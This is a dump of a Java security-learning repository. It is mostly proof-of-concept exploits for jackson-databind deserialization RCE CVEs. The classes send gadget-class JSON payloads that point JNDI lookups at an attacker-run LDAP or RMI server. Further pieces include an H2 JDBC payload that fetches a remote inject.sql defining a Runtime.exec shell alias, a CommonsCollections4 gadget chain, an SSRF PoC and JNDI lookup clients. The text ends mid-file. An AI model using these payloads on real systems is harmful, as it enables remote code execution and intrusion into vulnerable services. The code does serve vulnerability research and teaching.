2 |
3 | import com.fasterxml.jackson.databind.ObjectMapper;
4 | import com.threedr3am.bug.common.server.LdapServer;
5 | import java.io.IOException;
6 |
7 | /**
8 | * 比较鸡肋,需要调用writeValueAsString才能触发
9 | *
10 | * Reporter: 官方没禁,捡漏时间到了
11 | *
12 | * Fix will be included in:
13 | *
14 | * 2.9.10.4
15 | * Does not affect 2.10.0 and later
16 | *
17 | * aries.transaction.jms gadget
18 | *
19 | *
20 | * org.apache.aries.transaction
21 | * org.apache.aries.transaction.jms
22 | * 2.0.0
23 | *
24 | *
25 | * @author threedr3am
26 | */
27 | public class AriesJMSPoc {
28 |
29 | static {
30 | //rmi server示例
31 | // RmiServer.run();
32 |
33 | //ldap server示例
34 | LdapServer.run();
35 | }
36 |
37 | public static void main(String[] args) throws IOException {
38 | ObjectMapper mapper = new ObjectMapper();
39 | mapper.enableDefaultTyping();
40 |
41 | String json = "[\"org.apache.aries.transaction.jms.RecoverablePooledConnectionFactory\", {\"tmJndiName\": \"ldap://localhost:43658/Calc\", \"tmFromJndi\": true}]";
42 | Object o = mapper.readValue(json, Object.class);
43 | mapper.writeValueAsString(o);
44 | }
45 |
46 |
47 | }
48 |
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/AriesJMSPoc2.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.jackson.rce;
2 |
3 | import com.fasterxml.jackson.databind.ObjectMapper;
4 | import com.threedr3am.bug.common.server.LdapServer;
5 | import java.io.IOException;
6 |
7 | /**
8 | * 比较鸡肋,需要调用writeValueAsString才能触发
9 | *
10 | * Reporter: Srikanth Ramu
11 | *
12 | * Fix will be included in:
13 | *
14 | * 2.9.10.4
15 | * Does not affect 2.10.0 and later
16 | *
17 | * aries.transaction.jms gadget
18 | *
19 | *
20 | * org.apache.aries.transaction
21 | * org.apache.aries.transaction.jms
22 | * 2.0.0
23 | *
24 | *
25 | * @author threedr3am
26 | */
27 | public class AriesJMSPoc2 {
28 |
29 | static {
30 | //rmi server示例
31 | // RmiServer.run();
32 |
33 | //ldap server示例
34 | LdapServer.run();
35 | }
36 |
37 | public static void main(String[] args) throws IOException {
38 | ObjectMapper mapper = new ObjectMapper();
39 | mapper.enableDefaultTyping();
40 |
41 | String json = "[\"org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory\", {\"tmJndiName\": \"ldap://localhost:43658/Calc\", \"tmFromJndi\": true}]";
42 | Object o = mapper.readValue(json, Object.class);
43 | mapper.writeValueAsString(o);
44 | }
45 |
46 |
47 | }
48 |
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/EhcacheJndi.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.jackson.rce;
2 |
3 | import com.fasterxml.jackson.databind.ObjectMapper;
4 | import com.threedr3am.bug.common.server.LdapServer;
5 | import com.threedr3am.bug.common.server.RmiServer;
6 | import java.io.IOException;
7 |
8 | /**
9 | * CVE-2019-14379
10 | * jackson-databind RCE < 2.9.9.2
11 | * @author threedr3am
12 | */
13 | public class EhcacheJndi {
14 | static {
15 | //rmi server示例
16 | // RmiServer.run();
17 |
18 | //ldap server示例
19 | LdapServer.run();
20 | }
21 |
22 | public static void main(String[] args) throws IOException {
23 |
24 | String json = "[\"net.sf.ehcache.transaction.manager.DefaultTransactionManagerLookup\"," +
25 | "{\"properties\":{\"jndiName\":\"ldap://localhost:43658/Calc\"}}]";
26 | ObjectMapper mapper = new ObjectMapper();
27 | mapper.enableDefaultTyping();
28 | Object o = mapper.readValue(json, Object.class);
29 | mapper.writeValueAsString(o);
30 |
31 | }
32 | }
33 |
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/H2Rce.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.jackson.rce;
2 |
3 | import com.fasterxml.jackson.databind.ObjectMapper;
4 | import java.io.IOException;
5 |
6 | /**
7 | * CVE-2019-12384
8 | * jackson-databind RCE < 2.9.9.2
9 | * @author threedr3am
10 | */
11 | public class H2Rce {
12 | public static void main(String[] args) throws IOException {
13 |
14 | ObjectMapper objectMapper = new ObjectMapper();
15 | objectMapper.enableDefaultTyping();//开启 defaultTyping
16 | //TODO 把resources文件inject.sql放到http服务器
17 | String json = "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", " +
18 | "{\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:80/inject.sql'\"}]";
19 | Object o = objectMapper.readValue(json, Object.class);//反序列化对象
20 | String s = objectMapper.writeValueAsString(o);//
21 | }
22 | }
23 |
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/HikariConfigPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.jackson.rce;
2 |
3 | import com.fasterxml.jackson.databind.ObjectMapper;
4 | import com.threedr3am.bug.common.server.LdapServer;
5 | import java.io.IOException;
6 |
7 | /**
8 | * jackson-databind <= 2.7.9.6、<= 2.8.11.4、<= 2.9.9.3 RCE,需要开启DefaultType
9 | *
10 | *
11 | * com.zaxxer
12 | * HikariCP
13 | *
14 | *
15 | * @author threedr3am
16 | */
17 | public class HikariConfigPoc {
18 |
19 | static {
20 | //rmi server示例
21 | // RmiServer.run();
22 |
23 | //ldap server示例
24 | LdapServer.run();
25 | }
26 |
27 | public static void main(String[] args) throws IOException {
28 | //TODO 使用rmi server模式时,jdk版本高的需要开启URLCodebase trust
29 | // System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");
30 |
31 | ObjectMapper mapper = new ObjectMapper();
32 | mapper.enableDefaultTyping();
33 |
34 | // mapper.readValue("[\"com.zaxxer.hikari.HikariConfig\", {\"metricRegistry\":\"rmi://localhost:43657/Calc\"}]", Object.class);
35 | mapper.readValue("[\"com.zaxxer.hikari.HikariConfig\", {\"metricRegistry\":\"ldap://localhost:43658/Calc\"}]", Object.class);
36 | }
37 | }
38 |
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/IbatisSqlmapPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.jackson.rce;
2 |
3 | import com.fasterxml.jackson.databind.ObjectMapper;
4 | import com.threedr3am.bug.common.server.LdapServer;
5 | import java.io.IOException;
6 |
7 | /**
8 | *
9 | * jackson-databind <= 2.9.10.3 RCE,需要开启DefaultType (reported by threedr3am & V1ZkRA)
10 | *
11 | * CVE-2020-9547, CVE-2020-9548
12 | *
13 | *
14 | * org.apache.ibatis
15 | * ibatis-sqlmap
16 | * 2.3.4.726
17 | *
18 | *
19 | *
20 | * javax
21 | * javaee-api
22 | * 8.0.1
23 | *
24 | *
25 | * @author threedr3am
26 | */
27 | public class IbatisSqlmapPoc {
28 |
29 | static {
30 | //rmi server示例
31 | // RmiServer.run();
32 |
33 | //ldap server示例
34 | LdapServer.run();
35 | }
36 |
37 | public static void main(String[] args) throws IOException {
38 | ObjectMapper mapper = new ObjectMapper();
39 | mapper.enableDefaultTyping();
40 |
41 | String json = "[\"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\", {\"properties\": {\"UserTransaction\":\"ldap://localhost:43658/Calc\"}}]";
42 | mapper.readValue(json, Object.class);
43 | }
44 |
45 | }
46 |
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/IgniteJtaPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.jackson.rce;
2 |
3 | import com.fasterxml.jackson.databind.ObjectMapper;
4 | import com.threedr3am.bug.common.server.LdapServer;
5 | import java.io.IOException;
6 |
7 | /**
8 | *
9 | * 比较鸡肋,需要调用writeValueAsString才能触发
10 | *
11 | * ignite jta gadget
12 | *
13 | * Mitre id:
14 | * Reporters:
15 | *
16 | * Fix will be included in:
17 | *
18 | * 2.9.10.4
19 | * Does not affect 2.10.0 and later
20 | *
21 | *
22 | * org.apache.ignite
23 | * ignite-jta
24 | * 2.8.0
25 | *
26 | *
27 | * @author threedr3am
28 | */
29 | public class IgniteJtaPoc {
30 |
31 | static {
32 | //rmi server示例
33 | // RmiServer.run();
34 |
35 | //ldap server示例
36 | LdapServer.run();
37 | }
38 |
39 | public static void main(String[] args) throws IOException {
40 | ObjectMapper mapper = new ObjectMapper();
41 | mapper.enableDefaultTyping();
42 |
43 | String json = "[\"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup\", {\"jndiNames\": [\"java.util.ArrayList\", [\"ldap://localhost:43658/Calc\"]]}]";
44 | Object o = mapper.readValue(json, Object.class);
45 | mapper.writeValueAsString(o);
46 | }
47 |
48 | }
49 |
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/IgniteJtaPoc2.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.jackson.rce;
2 |
3 | import com.fasterxml.jackson.databind.ObjectMapper;
4 | import com.threedr3am.bug.common.server.LdapServer;
5 | import java.io.IOException;
6 | import org.apache.ignite.cache.jta.jndi.CacheJndiTmFactory;
7 |
8 | /**
9 | *
10 | * 鸡肋中的鸡肋,需要调用 ((CacheJndiTmFactory) o).create() 才能触发
11 | *
12 | * ignite jta gadget
13 | *
14 | * Mitre id:
15 | * Reporters:
16 | *
17 | * Fix will be included in:
18 | *
19 | * 2.9.10.4
20 | * Does not affect 2.10.0 and later
21 | *
22 | *
23 | * org.apache.ignite
24 | * ignite-jta
25 | * 2.8.0
26 | *
27 | *
28 | * @author threedr3am
29 | */
30 | public class IgniteJtaPoc2 {
31 |
32 | static {
33 | //rmi server示例
34 | // RmiServer.run();
35 |
36 | //ldap server示例
37 | LdapServer.run();
38 | }
39 |
40 | public static void main(String[] args) throws IOException {
41 | ObjectMapper mapper = new ObjectMapper();
42 | mapper.enableDefaultTyping();
43 |
44 | //最近看到的gadget怎么尽是鸡肋的鸡肋
45 | String json = "[\"org.apache.ignite.cache.jta.jndi.CacheJndiTmFactory\", {\"jndiNames\": [\"ldap://localhost:43658/Calc\"]}]";
46 | Object o = mapper.readValue(json, Object.class);
47 | ((CacheJndiTmFactory) o).create();
48 |
49 | }
50 |
51 | }
52 |
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/JndiConverterPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.jackson.rce;
2 |
3 | import com.fasterxml.jackson.databind.ObjectMapper;
4 | import com.threedr3am.bug.common.server.LdapServer;
5 | import java.io.IOException;
6 |
7 | /**
8 | *
9 | * jackson-databind <= 2.10.2 RCE,需要开启DefaultType (reported by threedr3am)
10 | *
11 | * CVE-2020-8840
12 | *
13 | * XBean-reflect依赖的gadget
14 | *
15 | *
16 | * org.apache.xbean
17 | * xbean-reflect
18 | *
19 | *
20 | * @author threedr3am
21 | */
22 | public class JndiConverterPoc {
23 |
24 | static {
25 | //rmi server示例
26 | // RmiServer.run();
27 |
28 | //ldap server示例
29 | LdapServer.run();
30 | }
31 |
32 | public static void main(String[] args) throws IOException {
33 | ObjectMapper mapper = new ObjectMapper();
34 | mapper.enableDefaultTyping();
35 |
36 | String json = "[\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://localhost:43658/Calc\"}]";
37 | mapper.readValue(json, Object.class);
38 | }
39 |
40 | }
41 |
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/LogbackJndi.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.jackson.rce;
2 |
3 | import com.fasterxml.jackson.databind.ObjectMapper;
4 | import com.threedr3am.bug.common.server.LdapServer;
5 | import com.threedr3am.bug.common.server.RmiServer;
6 | import java.io.IOException;
7 |
8 | /**
9 | * logback jndi rce jackson < 2.9.9.2
10 | *
11 | * CVE-2019-14439
12 | *
13 | * @author threedr3am
14 | */
15 | public class LogbackJndi {
16 | static {
17 | //rmi server示例
18 | // RmiServer.run();
19 |
20 | //ldap server示例
21 | LdapServer.run();
22 | }
23 |
24 | public static void main(String[] args) throws IOException {
25 |
26 | String json = "[\"ch.qos.logback.core.db.JNDIConnectionSource\",{\"jndiLocation\":\"ldap://localhost:43658/Calc\"}]";
27 | ObjectMapper mapper = new ObjectMapper();
28 | mapper.enableDefaultTyping();
29 | Object o = mapper.readValue(json, Object.class);
30 | mapper.writeValueAsString(o);
31 | }
32 | }
33 |
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/QuartzPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.jackson.rce;
2 |
3 | import com.fasterxml.jackson.annotation.JsonCreator;
4 | import com.fasterxml.jackson.annotation.JsonProperty;
5 | import com.fasterxml.jackson.databind.ObjectMapper;
6 | import com.threedr3am.bug.common.server.LdapServer;
7 | import java.io.IOException;
8 | import org.quartz.utils.JNDIConnectionProvider;
9 |
10 | /**
11 | * 比鸡肋还鸡肋的gadget
12 | *
13 | * @author threedr3am
14 | */
15 | public class QuartzPoc {
16 |
17 | static {
18 | //rmi server示例
19 | // RmiServer.run();
20 |
21 | //ldap server示例
22 | LdapServer.run();
23 | }
24 |
25 | public static void main(String[] args) throws IOException {
26 | ObjectMapper mapper = new ObjectMapper();
27 | mapper.enableDefaultTyping();
28 |
29 | //复现是复现了,但是这样的payload恕我直言,比鸡肋还鸡肋
30 | mapper.addMixIn(JNDIConnectionProvider.class, AbstractJNDIConnectionProvider.class);
31 | String json = "[\"org.quartz.utils.JNDIConnectionProvider\", {\"jndiUrl\": \"ldap://localhost:43658/Calc\"}]";
32 | mapper.readValue(json, Object.class);
33 | }
34 |
35 |
36 | }
37 | abstract class AbstractJNDIConnectionProvider extends JNDIConnectionProvider{
38 | @JsonCreator
39 | public AbstractJNDIConnectionProvider( @JsonProperty("jndiUrl") String jndiUrl, @JsonProperty ("alwaysLookup") boolean alwaysLookup) {
40 | super(jndiUrl, alwaysLookup);
41 | }
42 | }
43 |
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/QuercusPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.jackson.rce;
2 |
3 | import com.fasterxml.jackson.databind.ObjectMapper;
4 | import com.fasterxml.jackson.databind.SerializationFeature;
5 | import com.threedr3am.bug.common.server.LdapServer;
6 | import java.io.IOException;
7 |
8 | /**
9 | * 比较鸡肋,需要调用writeValueAsString才能触发
10 | *
11 | * quercus ResourceRef jndi gadget
12 | *
13 | *
14 | * com.caucho
15 | * quercus
16 | * 4.0.63
17 | *
18 | *
19 | * @author threedr3am
20 | */
21 | public class QuercusPoc {
22 |
23 | static {
24 | //rmi server示例
25 | // RmiServer.run();
26 |
27 | //ldap server示例
28 | LdapServer.run();
29 | }
30 |
31 | public static void main(String[] args) throws IOException {
32 | ObjectMapper mapper = new ObjectMapper();
33 | mapper.enableDefaultTyping();
34 |
35 | String json = "[\"com.caucho.config.types.ResourceRef\", {\"lookupName\": \"ldap://localhost:43658/Calc\"}]";
36 | Object o = mapper.readValue(json, Object.class);
37 | mapper.writeValueAsString(o);
38 | }
39 |
40 |
41 | }
42 |
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/ShiroPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.jackson.rce;
2 |
3 | import com.fasterxml.jackson.databind.ObjectMapper;
4 | import com.threedr3am.bug.common.server.LdapServer;
5 | import java.io.IOException;
6 |
7 | /**
8 | * 比较鸡肋,需要调用writeValueAsString才能触发,因为Collection getRealms()的返回值虽然是Collection,
9 | * 但是貌似是因为有泛型子类型导致值解析使用AsArrayTypeDeserialize,然后getter的invoke之前判断不为空就抛异常了
10 | *
11 | * shiro-core gadget
12 | *
13 | *
14 | * org.apache.shiro
15 | * shiro-core
16 | *
17 | *
18 | * @author threedr3am
19 | */
20 | public class ShiroPoc {
21 |
22 | static {
23 | //rmi server示例
24 | // RmiServer.run();
25 |
26 | //ldap server示例
27 | LdapServer.run();
28 | }
29 |
30 | public static void main(String[] args) throws IOException {
31 | ObjectMapper mapper = new ObjectMapper();
32 | mapper.enableDefaultTyping();
33 |
34 | String json = "[\"org.apache.shiro.realm.jndi.JndiRealmFactory\", {\"jndiNames\": \"ldap://localhost:43658/Calc\"}]";
35 | Object o = mapper.readValue(json, Object.class);
36 | mapper.writeValueAsString(o);
37 | }
38 |
39 |
40 | }
41 |
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/ShiroPoc2.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.jackson.rce;
2 |
3 | import com.fasterxml.jackson.databind.ObjectMapper;
4 | import com.threedr3am.bug.common.server.LdapServer;
5 | import java.io.IOException;
6 |
7 | /**
8 | * 比较鸡肋,需要调用writeValueAsString才能触发
9 | *
10 | * shiro-core gadget
11 | *
12 | *
13 | * org.apache.shiro
14 | * shiro-core
15 | *
16 | *
17 | * @author threedr3am
18 | */
19 | public class ShiroPoc2 {
20 |
21 | static {
22 | //rmi server示例
23 | // RmiServer.run();
24 |
25 | //ldap server示例
26 | LdapServer.run();
27 | }
28 |
29 | public static void main(String[] args) throws IOException {
30 | ObjectMapper mapper = new ObjectMapper();
31 | mapper.enableDefaultTyping();
32 |
33 | String json = "[\"org.apache.shiro.jndi.JndiObjectFactory\", {\"resourceName\": \"ldap://localhost:43658/Calc\"}]";
34 | Object o = mapper.readValue(json, Object.class);
35 | mapper.writeValueAsString(o);
36 | }
37 |
38 |
39 | }
40 |
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/SpringAopPoc2.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.jackson.rce;
2 |
3 | import com.fasterxml.jackson.databind.ObjectMapper;
4 | import com.threedr3am.bug.common.server.LdapServer;
5 | import java.io.IOException;
6 |
7 | /**
8 | *
9 | * spring gadget
10 | *
11 | *
12 | * org.springframework
13 | * spring-core
14 | * 4.3.26.RELEASE
15 | *
16 | *
17 | * org.springframework
18 | * spring-beans
19 | * 3.0.7.RELEASE
20 | *
21 | *
22 | * org.springframework
23 | * spring-web
24 | * 4.3.26.RELEASE
25 | *
26 | *
27 | * @author threedr3am
28 | */
29 | public class SpringAopPoc2 {
30 |
31 | static {
32 | //rmi server示例
33 | // RmiServer.run();
34 |
35 | //ldap server示例
36 | LdapServer.run();
37 | }
38 |
39 | public static void main(String[] args) throws IOException {
40 | ObjectMapper mapper = new ObjectMapper();
41 | mapper.enableDefaultTyping();
42 |
43 | String json = "[\"org.springframework.beans.factory.config.BeanReferenceFactoryBean\", {\"targetBeanName\": \"ldap://localhost:43658/Calc\",\"beanFactory\":[\"org.springframework.jndi.support.SimpleJndiBeanFactory\", {\"shareableResources\":[\"ldap://localhost:43658/Calc\"]}]}]";
44 | Object o = mapper.readValue(json, Object.class);
45 | }
46 |
47 |
48 | }
49 |
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/ssrf/JREJeditorPaneSSRFPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.jackson.ssrf;
2 |
3 | import com.fasterxml.jackson.databind.ObjectMapper;
4 | import com.threedr3am.bug.common.server.HTTPServer;
5 | import java.io.IOException;
6 |
7 | /**
8 | * jackson-databind <= 2.9.10.3 and <= 2.10.2 RCE,需要开启DefaultType
9 | *
10 | * (todo JRE自带依赖) (Discovered by threedr3am) 这个还是蛮好的gadget
11 | *
12 | * @author threedr3am
13 | */
14 | public class JREJeditorPaneSSRFPoc {
15 | static {
16 | HTTPServer.PORT = 23234;
17 | HTTPServer.run(null);
18 | }
19 |
20 | public static void main(String[] args) throws IOException {
21 | ObjectMapper mapper = new ObjectMapper();
22 | mapper.enableDefaultTyping();
23 |
24 | String json = "[\"javax.swing.JEditorPane\", {\"page\":\"http://127.0.0.1:23234?a=1&b=2222\"}]";
25 | mapper.readValue(json, Object.class);
26 | }
27 | }
28 |
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/test/PocTest.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.jackson.test;
2 |
3 | import com.fasterxml.jackson.databind.ObjectMapper;
4 | import com.threedr3am.bug.common.server.LdapServer;
5 | import java.io.IOException;
6 |
7 | /**
8 | * @author threedr3am
9 | */
10 | public class PocTest {
11 |
12 | static {
13 | //rmi server示例
14 | // RmiServer.run();
15 |
16 | //ldap server示例
17 | LdapServer.run();
18 | }
19 |
20 | public static void main(String[] args) throws IOException {
21 | ObjectMapper mapper = new ObjectMapper();
22 | mapper.enableDefaultTyping();
23 |
24 | String json = "[\"\", {\"aaaaa\":\"ldap://localhost:43658/Calc\"}]";
25 | mapper.readValue(json, Object.class);
26 | }
27 |
28 | }
29 |
--------------------------------------------------------------------------------
/jackson/src/main/resources/inject.sql:
--------------------------------------------------------------------------------
1 | CREATE ALIAS SHELLEXEC AS $$ void shellexec(String cmd) throws java.io.IOException {
2 | String[] command = {cmd};
3 | Runtime.getRuntime().exec(command);
4 | }
5 | $$;
6 | CALL SHELLEXEC('/Applications/Calculator.app/Contents/MacOS/Calculator')
--------------------------------------------------------------------------------
/java-compile/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 | learn-java-bug
7 | com.xyh
8 | 1.0-SNAPSHOT
9 |
10 | 4.0.0
11 |
12 | java-compile
13 |
14 |
15 |
16 | org.javassist
17 | javassist
18 | 3.25.0-GA
19 | compile
20 |
21 |
22 |
23 |
--------------------------------------------------------------------------------
/java-compile/src/main/java/com/threedr3am/bug/compile/javac/ByJavaCompiler.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.compile.javac;
2 |
3 | import javax.tools.JavaCompiler;
4 | import javax.tools.ToolProvider;
5 |
6 | /**
7 | * @author threedr3am
8 | */
9 | public class ByJavaCompiler {
10 |
11 | //直接使用JavaCompiler指定java文件编译
12 | public static void c() {
13 | JavaCompiler javaCompiler = ToolProvider.getSystemJavaCompiler();
14 | int compilationResult = javaCompiler.run(null, null, null, "-cp", "/tmp/ccc/CCC.jar", "/tmp/Main.java");
15 | // 返回0表示编译成功
16 | if (compilationResult == 0) {
17 | System.out.println("success");
18 | } else {
19 | System.out.println("fail");
20 | }
21 | }
22 |
23 | public static void main(String[] args) {
24 | c();
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/java-compile/src/main/java/com/threedr3am/bug/compile/package-info.java:
--------------------------------------------------------------------------------
1 | /**
2 | * @author threedr3am
3 | */
4 | package com.threedr3am.bug.compile;
--------------------------------------------------------------------------------
/nexus/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 | learn-java-bug
7 | com.xyh
8 | 1.0-SNAPSHOT
9 |
10 | 4.0.0
11 |
12 | nexus
13 |
14 |
15 |
--------------------------------------------------------------------------------
/padding-oracle-cbc/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 | learn-java-bug
7 | com.xyh
8 | 1.0-SNAPSHOT
9 |
10 | 4.0.0
11 |
12 | padding-oracle-cbc
13 |
14 |
15 |
16 | com.xyh
17 | common
18 | 1.0-SNAPSHOT
19 |
20 |
21 |
22 |
--------------------------------------------------------------------------------
/padding-oracle-cbc/src/main/java/com/threedr3am/bug/paddingoraclecbc/package-info.java:
--------------------------------------------------------------------------------
1 | /**
2 | * 类PaddingOracleCBC编写了小于等于16字节的字符的PaddingOracle和CBC翻转攻击的demo
3 | *
4 | * 类PaddingOracleCBC2编写了大于16字节的字符的PaddingOracle和CBC翻转攻击的demo
5 | *
6 | * @author xuanyh
7 | */
8 | package com.threedr3am.bug.paddingoraclecbc;
--------------------------------------------------------------------------------
/rmi/src/main/java/com/threedr3am/bug/rmi/CommonCollections4.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.rmi;
2 |
3 | import com.threedr3am.bug.common.utils.Reflections;
4 | import com.threedr3am.bug.rmi.utils.Gadgets;
5 | import org.apache.commons.collections4.bag.TreeBag;
6 | import org.apache.commons.collections4.comparators.TransformingComparator;
7 | import org.apache.commons.collections4.functors.InvokerTransformer;
8 |
9 | /**
10 | * @author threedr3am
11 | */
12 | public class CommonCollections4 {
13 |
14 | public static Object getPayload() throws Exception {
15 | Object templates = Gadgets.createTemplatesImpl("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
16 |
17 | // setup harmless chain
18 | final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
19 |
20 | // define the comparator used for sorting
21 | TransformingComparator comp = new TransformingComparator(transformer);
22 |
23 | // prepare CommonsCollections object entry point
24 | TreeBag tree = new TreeBag(comp);
25 | tree.add(templates);
26 |
27 | // arm transformer
28 | Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");
29 |
30 | return tree;
31 | }
32 |
33 | }
34 |
--------------------------------------------------------------------------------
/rmi/src/main/java/com/threedr3am/bug/rmi/client/JndiLookupForJdk8u121To191.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.rmi.client;
2 |
3 | import com.threedr3am.bug.common.server.LdapServer;
4 | import javax.naming.InitialContext;
5 | import javax.naming.NamingException;
6 |
7 | /**
8 | * @author threedr3am
9 | */
10 | public class JndiLookupForJdk8u121To191 {
11 |
12 | static {
13 | LdapServer.run();
14 | }
15 |
16 | public static void main(String[] args) {
17 | try {
18 | new InitialContext().lookup("ldap://127.0.0.1:43658/Calc");
19 | } catch (NamingException e) {
20 | e.printStackTrace();
21 | } catch (Exception e) {
22 | e.printStackTrace();
23 | }
24 | }
25 | }
26 |
--------------------------------------------------------------------------------
/rmi/src/main/java/com/threedr3am/bug/rmi/client/JndiLookupForLeJdk8u121.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.rmi.client;
2 |
3 | import com.threedr3am.bug.common.server.RmiServer;
4 | import javax.naming.InitialContext;
5 | import javax.naming.NamingException;
6 |
7 | /**
8 | * 在jdk8u121版本后,jdk加入了rmi远程代码信任机制,除非设置环境变量com.sun.jndi.rmi.object.trustURLCodebase为true,否则不会加载远程代码
9 | *
10 | * @author threedr3am
11 | */
12 | public class JndiLookupForLeJdk8u121 {
13 |
14 | static {
15 | RmiServer.run();
16 | }
17 |
18 | public static void main(String[] args) {
19 | try {
20 | new InitialContext().lookup("rmi://127.0.0.1:43657/Calc");
21 | } catch (NamingException e) {
22 | e.printStackTrace();
23 | } catch (Exception e) {
24 | e.printStackTrace();
25 | }
26 | }
27 | }
28 |
--------------------------------------------------------------------------------
/rmi/src/main/java/com/threedr3am/bug/rmi/server/service/HelloService.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.rmi.server.service;
2 |
3 | import java.rmi.Remote;
4 | import java.rmi.RemoteException;
5 |
6 | /**
7 | * @author threedr3am
8 | */
9 | public interface HelloService extends Remote {
10 |
11 | String sayHello() throws RemoteException;
12 | }
13 |
--------------------------------------------------------------------------------
/rmi/src/main/java/com/threedr3am/bug/rmi/server/service/HelloServiceImpl.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.rmi.server.service;
2 |
3 | import java.rmi.RemoteException;
4 | import java.rmi.server.UnicastRemoteObject;
5 |
6 | /**
7 | * @author threedr3am
8 | */
9 | public class HelloServiceImpl extends UnicastRemoteObject implements HelloService {
10 |
11 | public HelloServiceImpl() throws RemoteException {
12 | }
13 |
14 | @Override
15 | public String sayHello() {
16 | System.out.println("hello!");
17 | return "hello!";
18 | }
19 | }
--------------------------------------------------------------------------------
/security-manager/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 | learn-java-bug
7 | com.xyh
8 | 1.0-SNAPSHOT
9 |
10 | 4.0.0
11 |
12 | security-manager
13 |
14 |
15 |
--------------------------------------------------------------------------------
/security-manager/src/main/java/com/threedr3am/bug/security/manager/CodeBaseTest.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.security.manager;
2 |
3 | import java.io.FilePermission;
4 | import java.io.IOException;
5 | import java.security.AccessControlException;
6 |
7 | /**
8 | * @author xuanyh
9 | */
10 | public class CodeBaseTest {
11 |
12 | public static void main(String[] args) throws IOException, ClassNotFoundException {
13 | SecurityManager sm = System.getSecurityManager();
14 | try {
15 | sm.checkRead("/tmp/aaa");
16 | } catch (AccessControlException e) {
17 | System.out.println("没有权限:" + e.getMessage());
18 | }
19 | try {
20 | sm.checkWrite("/tmp/aaa");
21 | } catch (AccessControlException e) {
22 | System.out.println("没有权限:" + e.getMessage());
23 | }
24 | try {
25 | sm.checkDelete("/tmp/aaa");
26 | } catch (AccessControlException e) {
27 | System.out.println("没有权限:" + e.getMessage());
28 | }
29 | try {
30 | sm.checkPermission(new FilePermission("/tmp/aaa","execute"));
31 | } catch (AccessControlException e) {
32 | System.out.println("没有权限:" + e.getMessage());
33 | }
34 | }
35 | }
36 | /**
37 | * grant codeBase "file:/Users/xuanyh/IdeaProjects/learnjavabug/target/classes/*" {
38 | * permission java.io.FilePermission "/tmp/aaa","read";
39 | * };
40 | */
41 |
--------------------------------------------------------------------------------
/security-manager/src/main/java/com/threedr3am/bug/security/manager/Evil.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.security.manager;
2 |
3 | import java.security.AccessController;
4 | import java.security.PrivilegedAction;
5 |
6 | /**
7 | * @author threedr3am
8 | */
9 | public class Evil {
10 | static {
11 | AccessController.doPrivileged(new PrivilegedAction